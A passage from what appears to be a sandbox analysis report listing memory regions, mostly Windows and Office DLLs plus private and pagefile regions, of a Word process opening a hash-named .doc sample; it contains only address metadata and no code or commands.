Region: id = 405 start_va = 0x6a850000 end_va = 0x6a87bfff monitored = 0 entry_point = 0x6a8724b0 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\SysWOW64\\d3d10_1.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1.dll") Region: id = 406 start_va = 0x6a880000 end_va = 0x6a997fff monitored = 0 entry_point = 0x6a8840b1 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\msptls.dll") Region: id = 407 start_va = 0x6a9a0000 end_va = 0x6a9e3fff monitored = 0 entry_point = 0x6a9baaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 408 start_va = 0x6a9f0000 end_va = 0x6a9fefff monitored = 0 entry_point = 0x6a9f2a50 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 409 start_va = 0x6aa00000 end_va = 0x6ad88fff monitored = 0 entry_point = 0x6aa9cc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 410 start_va = 0x6ad90000 end_va = 0x6bb41fff monitored = 0 entry_point = 0x6ad91000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 411 start_va = 0x6bb50000 end_va = 0x6bb6cfff monitored = 0 entry_point = 0x6bb57240 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\SysWOW64\\sppc.dll" (normalized: "c:\\windows\\syswow64\\sppc.dll") Region: id = 412 start_va = 0x6bb70000 end_va = 0x6bb8ffff monitored = 0 entry_point = 0x6bb82810 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 413 start_va = 0x6bb90000 end_va = 0x6bb95fff monitored = 0 entry_point = 0x6bb91490 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 414 start_va = 0x6bba0000 end_va = 0x6c137fff monitored = 0 entry_point = 0x6bba1000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 415 start_va = 0x6c140000 end_va = 0x6c854fff monitored = 0 entry_point = 0x6c141000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 416 start_va = 0x6c860000 end_va = 0x6cb61fff monitored = 0 entry_point = 0x6c861000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 417 start_va = 0x6cb70000 end_va = 0x6cd44fff monitored = 0 entry_point = 0x6cb71000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 418 start_va = 0x6cd50000 end_va = 0x6d941fff monitored = 0 entry_point = 0x6cd51000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\OART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\oart.dll") Region: id = 419 start_va = 0x6d950000 end_va = 0x6d9bffff monitored = 0 entry_point = 0x6d98ec20 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\SysWOW64\\msvcp140.dll" (normalized: "c:\\windows\\syswow64\\msvcp140.dll") Region: id = 420 start_va = 0x6d9c0000 end_va = 0x6db2afff monitored = 0 entry_point = 0x6da2e360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 421 start_va = 0x6db30000 end_va = 0x6f791fff monitored = 0 entry_point = 0x6db31000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\WWLIB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wwlib.dll") Region: id = 422 start_va = 0x6f7a0000 end_va = 0x6f880fff monitored = 0 entry_point = 0x6f7ce6b0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 423 start_va = 0x6f890000 end_va = 0x6f8a3fff monitored = 0 entry_point = 0x6f89e290 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\SysWOW64\\vcruntime140.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140.dll") Region: id = 424 start_va = 0x6f8b0000 end_va = 0x6f8dcfff monitored = 0 entry_point = 0x6f8c2b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 425 start_va = 0x6f970000 end_va = 0x6f9a2fff monitored = 0 entry_point = 0x6f980e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 426 start_va = 0x6f9b0000 end_va = 0x6f9b9fff monitored = 0 entry_point = 0x6f9b3200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 427 start_va = 0x6fad0000 end_va = 0x6fce7fff monitored = 0 entry_point = 0x6fb797b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 428 start_va = 0x6fdf0000 end_va = 0x6ff3afff monitored = 0 entry_point = 0x6fe51660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 429 start_va = 0x702d0000 end_va = 0x7039cfff monitored = 0 entry_point = 0x703229c0 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\SysWOW64\\twinapi.appcore.dll" (normalized: "c:\\windows\\syswow64\\twinapi.appcore.dll") Region: id = 430 start_va = 0x703a0000 end_va = 0x70446fff monitored = 0 entry_point = 0x703d6240 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\SysWOW64\\dcomp.dll" (normalized: "c:\\windows\\syswow64\\dcomp.dll") Region: id = 431 start_va = 0x70450000 end_va = 0x70669fff monitored = 0 entry_point = 0x704e5550 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 432 start_va = 0x70750000 end_va = 0x707d2fff monitored = 0 entry_point = 0x707737c0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 433 start_va = 0x707e0000 end_va = 0x709d0fff monitored = 0 entry_point = 0x708c3cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 434 start_va = 0x709e0000 end_va = 0x70e6dfff monitored = 0 entry_point = 0x70d6a320 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 435 start_va = 0x711b0000 end_va = 0x711cafff monitored = 0 entry_point = 0x711b9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 436 start_va = 0x72c90000 end_va = 0x72cacfff monitored = 0 entry_point = 0x72c93b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 437 start_va = 0x72cb0000 end_va = 0x72d24fff monitored = 0 entry_point = 0x72ce9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 438 start_va = 0x72dd0000 end_va = 0x72fdefff monitored = 0 entry_point = 0x72e7b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 439 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 440 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 441 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 442 start_va = 0x73f30000 end_va = 0x73f8efff monitored = 0 entry_point = 0x73f34af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 443 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 444 start_va = 0x74340000 end_va = 0x743c3fff monitored = 0 entry_point = 0x74366220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 445 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 446 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 447 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 448 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 449 start_va = 0x74dc0000 end_va = 0x74eaafff monitored = 0 entry_point = 0x74dfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 450 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 451 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 452 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 453 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 454 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 455 start_va = 0x76680000 end_va = 0x76711fff monitored = 0 entry_point = 0x766b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 456 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 457 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 458 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 459 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 460 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 461 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 462 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 463 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 464 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 465 start_va = 0x77170000 end_va = 0x771c9fff monitored = 0 entry_point = 0x77197e70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\SysWOW64\\coml2.dll" (normalized: "c:\\windows\\syswow64\\coml2.dll") Region: id = 466 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 467 start_va = 0x7fea0000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fea0000" filename = "" Region: id = 468 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 469 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 470 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 471 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 472 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 473 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 474 start_va = 0x713f0000 end_va = 0x7156dfff monitored = 0 entry_point = 0x7146c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 475 start_va = 0x73b80000 end_va = 0x73e4afff monitored = 0 entry_point = 0x73dbc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 476 start_va = 0xae0000 end_va = 0xae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 477 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 478 start_va = 0xf760000 end_va = 0xfbe3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc03a16fa9f952e8f1f69929dda7abcdoc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc03a16fa9f952e8f1f69929dda7abcdoc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc03a16fa9f952e8f1f69929dda7abcdoc") Region: id = 479 start_va = 0x68460000 end_va = 0x68469fff monitored = 0 entry_point = 0x68462a34 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wordcnvpxy.cnv") Region: id = 480 start_va = 0x68460000 end_va = 0x68469fff monitored = 0 entry_point = 0x68462a34 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wordcnvpxy.cnv") Region: id = 481 start_va = 0x68460000 end_va = 0x6846bfff monitored = 0 entry_point = 0x684628fd region_type = mapped_file name = "recovr32.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\recovr32.cnv") Region: id = 482 start_va = 0x68440000 end_va = 0x6845ffff monitored = 0 entry_point = 0x6844c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 483 start_va = 0x68430000 end_va = 0x68461fff monitored = 0 entry_point = 0x6844c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 484 start_va = 0x68410000 end_va = 0x6842ffff monitored = 0 entry_point = 0x6841c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 485 start_va = 0x68430000 end_va = 0x6846efff monitored = 0 entry_point = 0x68454c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 486 start_va = 0x68410000 end_va = 0x6842ffff monitored = 0 entry_point = 0x6841c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 487 start_va = 0x68430000 end_va = 0x68461fff monitored = 0 entry_point = 0x6844c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 488 start_va = 0x68410000 end_va = 0x6842ffff monitored = 0 entry_point = 0x6841c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 489 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 490 start_va = 0xf760000 end_va = 0xfbe3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc") Region: id = 491 start_va = 0x68430000 end_va = 0x6846efff monitored = 0 entry_point = 0x68454c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 492 start_va = 0x68410000 end_va = 0x6842ffff monitored = 0 entry_point = 0x6841c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 493 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 494 start_va = 0xce50000 end_va = 0xd091fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc") Region: id = 495 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 496 start_va = 0xf760000 end_va = 0xfbe3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc") Region: id = 497 start_va = 0x68430000 end_va = 0x68461fff monitored = 0 entry_point = 0x6844c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 498 start_va = 0x68410000 end_va = 0x6842ffff monitored = 0 entry_point = 0x6841c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 499 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 500 start_va = 0xf760000 end_va = 0xfbe3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc") Region: id = 501 start_va = 0x68430000 end_va = 0x6846efff monitored = 0 entry_point = 0x68454c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 502 start_va = 0x68410000 end_va = 0x6842ffff monitored = 0 entry_point = 0x6841c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 503 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 504 start_va = 0xce50000 end_va = 0xd091fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc") Region: id = 505 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 506 start_va = 0xf760000 end_va = 0xfbe3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\e9258541a5c96fcacb6a2ce349282db7e9403a16fa9f952e8f1f69929dda7abc.doc") Region: id = 507 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 508 start_va = 0xf360000 end_va = 0xfb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f360000" filename = "" Region: id = 509 start_va = 0xfb60000 end_va = 0xff29fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 510 start_va = 0xff30000 end_va = 0x10302fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ff30000" filename = "" Region: id = 511 start_va = 0xce50000 end_va = 0xd033fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce50000" filename = "" Region: id = 512 start_va = 0xfb60000 end_va = 0xfd49fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 513 